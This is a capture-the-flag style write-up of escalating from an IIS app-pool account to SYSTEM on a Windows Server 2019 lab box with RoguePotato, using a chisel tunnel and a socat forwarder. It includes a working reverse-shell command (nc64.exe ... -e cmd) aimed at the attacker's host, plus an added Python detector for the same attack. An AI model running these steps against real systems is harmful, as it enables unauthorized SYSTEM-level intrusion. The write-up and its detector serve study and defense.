Rogue Potato
The compromised IIS APPPOOL\DefaultAppPool account has both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege set. This makes the target system vulnerable to the Potato family of token-impersonation exploits.
I would usually use JuicyPotato for token impersonation, but it does not work on anything above Windows 10 1809 and Windows Server 2019. The target system is Windows Server 2019, so I will be using an alternative: RoguePotato.
- RoguePotato instructs the DCOM server to perform a remote OXID query by specifying a remote IP (the attacker's IP).
- On the remote IP, set up a “socat” listener that redirects the OXID resolution requests to a fake OXID RPC server.
- The fake OXID RPC server implements the ResolveOxid2 server procedure, which will point to a controlled named pipe:
  ncacn_np:localhost/pipe/roguepotato[\pipe\epmapper]
- The DCOM server will connect to the RPC server in order to perform the IRemUnknown2 interface call. By connecting to the named pipe, an “Authentication Callback” will be performed and we can impersonate the caller via an RpcImpersonateClient() call.
- Then, a token stealer will:
  - Get the PID of the rpcss service
  - Open the process, list all handles and, for each handle, try to duplicate it and get the handle type
  - If the handle type is “Token” and the token owner is SYSTEM, try to impersonate and launch a process with CreateProcessAsUser() or CreateProcessWithToken()
What do you need to make it work?
- You need to have a machine under your control where you can perform the redirect, and this machine must be accessible on port 135 by the victim.
- Upload both exe files from the PoC. In fact, it is also possible to launch the fake OXID Resolver in standalone mode on a Windows machine under our control when the victim's firewall won't accept incoming connections. More info: https://0xdf.gitlab.io/2020/09/08/roguepotato-on-remote.html
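As an added defender's-side example (not part of the original writeup or of the RoguePotato project), the following Python scans flattened Sysmon-style events for the two tells of the flow above: a nested named pipe ending in \pipe\epmapper, and an outbound TCP/135 OXID resolution from the RPCSS service identity (NETWORK SERVICE) to a peer outside a known DCOM peer allowlist. The "Key=Value" event layout, the field names and the sample events are constructed for this example; only the addresses and pipe name come from the writeup.

```python
import re

# Parser for one flattened Sysmon-style event line ("Key=Value Key=Value ...").
# This layout is constructed for the example; real Sysmon events are XML/EVTX.
_FIELD = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")

def parse_event(line):
    return {k: v for k, v in _FIELD.findall(line.strip())}

# Sysmon's PipeName field omits the "\\.\pipe\" prefix, so the legitimate
# endpoint mapper shows up as "\epmapper". Potato-style tools register a nested
# pipe such as "\RoguePotato\pipe\epmapper" so that the DCOM server binds to
# "ncacn_np:localhost/pipe/<name>[\pipe\epmapper]" under the attacker's control.
def suspicious_pipe(ev):
    name = ev.get("PipeName", "").lower()
    return (ev.get("EventID") == "17"
            and name != "\\epmapper"
            and name.endswith("\\pipe\\epmapper"))

# The OXID query itself is issued by the RPCSS service (svchost.exe running as
# NETWORK SERVICE) to TCP/135 on whatever host the trigger named. Outbound 135
# from that identity to a peer outside the known DCOM peer set is the network tell.
def suspicious_oxid_egress(ev, allowed_peers):
    return (ev.get("EventID") == "3"
            and ev.get("Initiated", "").lower() == "true"
            and ev.get("DestinationPort") == "135"
            and ev.get("User", "").upper().endswith("\\NETWORK SERVICE")
            and ev.get("DestinationIp") not in allowed_peers)

def scan(lines, allowed_peers=frozenset()):
    hits = []
    for line in lines:
        ev = parse_event(line)
        if suspicious_pipe(ev):
            hits.append(("potato_pipe", ev["Image"], ev["PipeName"]))
        if suspicious_oxid_egress(ev, allowed_peers):
            hits.append(("oxid_egress", ev["Image"], ev["DestinationIp"]))
    return hits

# Constructed sample events modelled on the writeup's flow (10.10.16.8 is the
# attacker host, 10.10.10.2 stands in for a legitimate DCOM peer on the LAN).
SAMPLE_EVENTS = [
    "EventID=17 Image=C:\\tmp\\RoguePotato.exe User=IIS APPPOOL\\DefaultAppPool PipeName=\\RoguePotato\\pipe\\epmapper",
    "EventID=17 Image=C:\\Windows\\System32\\svchost.exe User=NT AUTHORITY\\NETWORK SERVICE PipeName=\\epmapper",
    "EventID=3 Image=C:\\Windows\\System32\\svchost.exe User=NT AUTHORITY\\NETWORK SERVICE DestinationIp=10.10.16.8 DestinationPort=135 Initiated=true",
    "EventID=3 Image=C:\\Windows\\System32\\svchost.exe User=NT AUTHORITY\\NETWORK SERVICE DestinationIp=10.10.10.2 DestinationPort=135 Initiated=true",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS, allowed_peers={"10.10.10.2"}):
        print(hit)
```

The pipe rule fires on the tool's own process; the egress rule fires on svchost.exe, because the connection to port 135 is made by RPCSS rather than by the PoC binary.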
Exploit
Exploit found online from a GitHub repository.
PS C:\tmp> copy \\10.10.16.8\smb\potato\RoguePotato.exe .
Delivery complete.
Tunneling
The exploitation requires tunneling because the active firewall blocks inbound traffic except for those 3 open ports.
PS C:\tmp> copy \\10.10.16.8\smb\chiselx64.exe .
Delivery complete.
Server
┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ chisel server -p 55555 --reverse -v
2023/11/24 03:21:04 server: Reverse tunnelling enabled
2023/11/24 03:21:04 server: Fingerprint XrqpqYVLG4ly5Oobt3WFinyA2pq7rjTrHvtm351SoUM=
2023/11/24 03:21:04 server: Listening on http://0.0.0.0:55555
Starting a chisel server on Kali
Client
PS C:\tmp> START /B C:\tmp\chiselx64.exe client 10.10.16.8:55555 R:5555:127.0.0.1:5555
Tunneling Kali's port 5555 to the target's socket, 127.0.0.1:5555. The OXID Resolver Request will be passed back to RoguePotato.exe through the tunnel, as the exploit is listening on port 5555.
The tunneling command was wrapped in the START /B command to make it run in the background, so that I can continue to use the terminal.
┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ curl http://alpha.worker.htb/shell.aspx
Re-establishing the PowerShell session
┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.203] 50813
Windows PowerShell running as user WORKER$ on WORKER
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv> ps | Select-String chisel
System.Diagnostics.Process (chiselx64)
Re-established and the chisel client is still up and running in the background
Exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ socat -v tcp-listen:135,reuseaddr,fork tcp:127.0.0.1:5555
The network forwarder above will receive, on Kali's port 135, the OXID Resolver Request that RoguePotato.exe triggers on the target, and forward it to Kali's tcp:127.0.0.1:5555, which is tunneled to the target socket 127.0.0.1:5555.
Overall it would look like this, except with port 5555 rather than 9999.
PS C:\tmp> cmd /c C:\tmp\RoguePotato.exe -r 10.10.16.8 -e "C:\tmp\nc64.exe 10.10.16.8 1234 -e cmd" -l 5555
[+] Starting RoguePotato...
[*] Creating Rogue OXID resolver thread
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[*] Listening on pipe \\.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[*] Calling CoGetInstanceFromIStorage with CLSID:{4991d34b-80a1-4291-83b6-3328366b9097}
[*] Starting RogueOxidResolver RPC Server listening on port 5555 ...
[*] IStoragetrigger written:102 bytes
[*] SecurityCallback RPC call
[*] ServerAlive2 RPC Call
[*] SecurityCallback RPC call
[*] ResolveOxid2 RPC call, this is for us!
[*] ResolveOxid2: returned endpoint binding information = ncacn_np:localhost/pipe/RoguePotato[\pipe\epmapper]
[*] Client connected!
[+] Got SYSTEM Token!!!
[*] Token has SE_ASSIGN_PRIMARY_NAME, using CreateProcessAsUser() for launching: C:\tmp\nc64.exe 10.10.16.8 1234 -e cmd
[+] RoguePotato gave you the SYSTEM powerz :D
RoguePotato.exe received the OXID Resolver Request from Kali's network forwarder and exploited it. The successful exploit triggered the reverse shell.
┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ socat -v tcp-listen:135,reuseaddr,fork tcp:127.0.0.1:5555
With the -v flag, I can also see the verbose traffic of the socat network forwarder: the NTLMSSP authentication exchange, the ResolveOxid2 reply carrying the binding localhost/pipe/RoguePotato[\pipe\epmapper], and the calling identity NT AUTHORITY\NETWORK SERVICE. It forwarded the OXID Resolver Request to Kali's socket, 127.0.0.1:5555, which is tunneled to the target socket, 127.0.0.1:5555, where RoguePotato.exe was listening.
┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.203] 50974
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\tmp> whoami
whoami
nt authority\system
C:\tmp> hostname
hostname
Worker
C:\tmp> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::248
IPv6 Address. . . . . . . . . . . : dead:beef::1cb0:fbca:343f:d725
Link-local IPv6 Address . . . . . : fe80::1cb0:fbca:343f:d725%4
IPv4 Address. . . . . . . . . . . : 10.10.10.203
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%4
10.10.10.2
System Level Compromise